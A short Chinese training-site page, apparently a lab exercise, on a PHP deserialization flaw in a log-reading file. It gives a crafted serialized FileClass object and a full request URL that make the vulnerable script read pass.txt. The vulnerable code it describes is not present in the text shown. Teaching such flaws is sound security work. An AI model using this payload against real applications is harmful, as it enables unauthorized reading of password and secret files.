序列化漏洞二:文件读取

程序漏洞代码输出位置
程序代码如下:
以上代码本是一个读取错误日志功能的文件,但是里面因为对用户类进行了实例化,而且还可以传值可控,造成了漏洞
#构造反序列化字符串,读取目录下pass.txt内容
O:9:"FileClass":1:{s:8:"filename";s:8:"pass.txt";}
http://www.nanhack.com/payload/unserilization/read.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:8:"pass.txt";}
© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2  
本站一切信息皆遵守中华人民共和国法律,如发现任何不良信息,请拨打电话:18622800700
网络安全培训、企业合作、院校合作: 15320004362(手机同微信)